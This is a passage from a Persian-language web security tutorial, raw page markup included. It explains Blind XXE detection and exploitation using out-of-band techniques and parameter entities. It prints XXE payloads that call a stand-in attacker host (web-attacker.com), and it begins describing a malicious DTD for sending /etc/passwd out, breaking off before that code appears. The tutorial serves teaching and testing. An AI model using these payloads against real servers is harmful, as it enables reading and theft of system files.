\u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0639\u0645\u0648\u0645\u0627\u064b \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc XXE \u0645\u0639\u0645\u0648\u0644\u06cc \u0633\u062e\u062a\u200c\u062a\u0631 \u0627\u0633\u062a.\n\u0628\u0631\u0627\u06cc \u067e\u06cc\u062f\u0627\u06a9\u0631\u062f\u0646 \u0648 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0627\u0632 \u062f\u0648 \u0631\u0648\u06cc\u06a9\u0631\u062f \u06a9\u0644\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f:\n<ul>\n \t<li><span style=\"font-size: 10pt;\"><strong>\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a \u0634\u0628\u06a9\u0647\u200c\u06cc out-of-band \u0634\u0648\u06cc\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0631\u0648\u0634 \u06af\u0627\u0647\u06cc \u0627\u0648\u0642\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0631\u0627 \u0627\u0632 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0627\u0631\u062a\u0628\u0627\u0637\u06cc \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u062f.<\/strong><\/span><\/li>\n \t<li><span style=\"font-size: 10pt;\"><strong>\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f Parsing Error \u06cc\u0627 \u062e\u0637\u0627\u0647\u0627\u06cc \u062a\u062c\u0632\u06cc\u0647\u200c\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u0645\u062a\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u062f\u0631 \u0622\u0646\u200c\u0647\u0627\u060c \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0628\u0627\u0634\u062f.<\/strong><\/span><\/li>\n<\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-dc07c55 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"dc07c55\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2341927\" data-id=\"2341927\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dbd0864 elementor-widget elementor-widget-text-editor\" data-id=\"dbd0864\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"oast\"><span style=\"font-size: 12pt;\">\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc OAST (\u06cc\u0627 out-of-band)<\/span><\/h3>\n\u0645\u0639\u0645\u0648\u0644\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u0647\u0645\u0627\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a XXE SSRF \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc Blind XXE \u0631\u0627 \u0646\u06cc\u0632 \u0628\u06cc\u0627\u0628\u06cc\u062f\u061b \u062a\u0641\u0627\u0648\u062a \u062f\u0631 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u0645\u0642\u062f\u0627\u0631 External Entity\u060c \u0627\u0632 URL \u0633\u06cc\u0633\u062a\u0645\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u0634\u0645\u0627\u0633\u062a\u060c \u0648 \u0627\u06cc\u0646\u200c\u06af\u0648\u0646\u0647 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a out-of-band \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-84b59b6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"84b59b6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eaf6773\" data-id=\"eaf6773\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e436031 elementor-widget elementor-widget-text-editor\" data-id=\"e436031\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &#8220;http:\/\/f2g9j7hhkax.web-attacker.com&#8221;&gt; ]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-05422f4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"05422f4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c8fdc14\" data-id=\"c8fdc14\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-811e1c9 elementor-widget elementor-widget-text-editor\" data-id=\"811e1c9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u067e\u0633 \u0627\u0632 \u062a\u0639\u0631\u06cc\u0641 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u0628\u0627\u06cc\u062f \u062f\u0631 \u0645\u06cc\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0641\u0627\u06cc\u0644 XML \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. <br \/>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc XXE \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0633\u0631\u0648\u0631 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u06a9\u200c\u0627\u0646\u062f \u0628\u0647 URL \u062a\u0639\u06cc\u06cc\u0646\u200c\u0634\u062f\u0647 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f. \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0641\u0631\u0627\u06cc\u0646\u062f DNS Lookup \u0648 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0631\u0627 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631 \u06a9\u0646\u062f\u060c \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642 \u0645\u062a\u0648\u062c\u0647 \u0634\u0648\u062f \u062d\u0645\u0644\u0647\u200c\u06cc XXE \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0647 \u06cc\u0627 \u0646\u0647.<\/p><p>\u0628\u0639\u0636\u06cc \u0627\u0648\u0642\u0627\u062a \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0627\u0632 \u06cc\u06a9 \u0641\u0631\u0627\u06cc\u0646\u062f input validation \u0628\u0631\u0627\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u06cc\u0627 XML parser \u06cc\u0627 \u0647\u0645\u0627\u0646 XML processor \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u06cc \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u060c \u0647\u0627\u0631\u062f\u0646\u06cc\u0646\u06af \u0634\u062f\u0647 \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u062d\u0645\u0644\u0627\u062a XXE \u06a9\u0647 \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u0645\u0639\u0645\u0648\u0644\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0628\u0644\u0627\u06a9 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 Parameter Entity \u06cc\u0627 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. Parameter Entity \u0646\u0648\u0639 \u062e\u0627\u0635\u06cc \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc XML \u0627\u0633\u062a \u06a9\u0647 \u0641\u0642\u0637 \u062f\u0631 \u062f\u0627\u062e\u0644 DTD \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0647 \u0622\u0646 \u0627\u0631\u062c\u0627\u0639 \u062f\u0627\u062f \u0648 \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062e\u0627\u0631\u062c \u0627\u0632 DTD \u0622\u0646 \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0631\u062f. \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062a\u0633\u062a \u0646\u0641\u0648\u0630 XXE\u060c \u06a9\u0627\u0641\u06cc\u200c\u0627\u0633\u062a \u0641\u0642\u0637 \u062f\u0648 \u0686\u06cc\u0632 \u0631\u0627 \u0631\u0627\u062c\u0639 \u0628\u0647 \u0627\u06cc\u0646 \u0646\u0648\u0639 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0628\u062f\u0627\u0646\u06cc\u062f. \u0627\u0648\u0644 \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u062a\u0639\u0631\u06cc\u0641 Parameter Entity \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0639\u0644\u0627\u0645\u062a \u00ab % \u00bb \u067e\u06cc\u0634 \u0627\u0632 \u0646\u0627\u0645 \u0622\u0646 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-13db797 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"13db797\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-665f35d\" data-id=\"665f35d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dc870d5 elementor-widget elementor-widget-text-editor\" data-id=\"dc870d5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % myparameterentity &#8220;my parameter entity value&#8221; &gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9078cfb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9078cfb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f43b4fc\" data-id=\"f43b4fc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3132a44 elementor-widget elementor-widget-text-editor\" data-id=\"3132a44\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0648 \u0646\u06a9\u062a\u0647\u200c\u06cc \u062f\u0648\u0645 \u0627\u06cc\u0646 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc\u060c \u0628\u0627\u06cc\u062f \u0628\u0647 \u062c\u0627\u06cc \u0639\u0644\u0627\u0645\u062a \u00ab &amp; \u00bb \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u0645\u0639\u0645\u0648\u0644\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0627\u0632 \u0639\u0644\u0627\u0645\u062a \u00ab % \u00bb \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5736bb8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5736bb8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-521b3b8\" data-id=\"521b3b8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d807678 elementor-widget elementor-widget-text-editor\" data-id=\"d807678\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>%myparameterentity;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a4392fe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a4392fe\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2891cea\" data-id=\"2891cea\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e30564d elementor-widget elementor-widget-text-editor\" data-id=\"e30564d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062d\u0627\u0644 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0631\u0648\u0634 \u062a\u0634\u062e\u06cc\u0635 out-of-band \u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062a\u0633\u062a \u06a9\u0646\u06cc\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u06cc\u0627 \u062e\u06cc\u0631:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4322c3a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4322c3a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1cf5ea7\" data-id=\"1cf5ea7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5dbb4a0 elementor-widget elementor-widget-text-editor\" data-id=\"5dbb4a0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code class=\"language-unknown\"><\/code><\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM &#8220;http:\/\/f2g9j7hhkax.web-attacker.com&#8221;&gt; %xxe; ]&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-11fc162 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"11fc162\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7507199\" data-id=\"7507199\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-78a0ee3 elementor-widget elementor-widget-text-editor\" data-id=\"78a0ee3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 xxe \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0633\u067e\u0633 \u062f\u0627\u062e\u0644 DTD \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0627\u0646\u062c\u0627\u0645 \u06cc\u06a9 DNS Lookup \u0648 \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a HTTP \u0628\u0647 \u062f\u0627\u0645\u0646\u0647\u200c\u06cc \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u06a9\u0647 \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062d\u0645\u0644\u0647 \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0647 \u0627\u0633\u062a.<\/p><h4 id=\"oast-file-retrieval\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062f\u0627\u062f\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a out-of-band<\/span><\/h4><p>\u062e\u0628 \u062d\u0627\u0644\u0627 \u0641\u0647\u0645\u06cc\u062f\u06cc\u0645 \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u06a9\u0648\u0631 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc out-of-band \u062a\u0634\u062e\u06cc\u0635 \u062f\u0647\u06cc\u0645\u060c \u0648\u0644\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0641\u0647\u0645\u06cc\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u06a9\u0631\u062f. \u062f\u0631 \u0648\u0627\u0642\u0639 \u0647\u062f\u0641 \u0627\u0635\u0644\u06cc \u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0627\u0633\u062a\u060c \u0646\u0647 \u0635\u0631\u0641\u0627 \u06cc\u0627\u0641\u062a\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc. \u0628\u0631\u0627\u06cc \u0631\u0633\u06cc\u062f\u0646 \u0628\u0647 \u0627\u06cc\u0646 \u0647\u062f\u0641 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Blind XXE \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u060c \u0648\u0644\u06cc \u0645\u0647\u0627\u062c\u0645 \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u0631\u0627 \u0631\u0648\u06cc \u0633\u06cc\u0633\u062a\u0645\u06cc \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u06a9\u0646\u062f \u06a9\u0647 \u062f\u0631 \u06a9\u0646\u062a\u0631\u0644 \u062e\u0648\u062f\u0634 \u0628\u0627\u0634\u062f\u060c \u0648 \u0633\u067e\u0633 \u062f\u0627\u062e\u0644 \u062e\u0648\u062f \u067e\u06cc\u200c\u0644\u0648\u062f XXE\u060c \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u0631\u0627 \u0635\u062f\u0627 \u0628\u0632\u0646\u062f.<br \/>\u06cc\u06a9 \u0645\u062b\u0627\u0644 \u0627\u0632 \u06cc\u06a9 DTD \u0645\u062e\u0631\u0628 \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u060c \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0627\u0633\u062a:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e505bc9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e505bc9\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5b3aa63\" data-id=\"5b3aa63\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-590fb5c elementor-widget elementor-widget-text-editor\" data-id=\"590fb5c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: 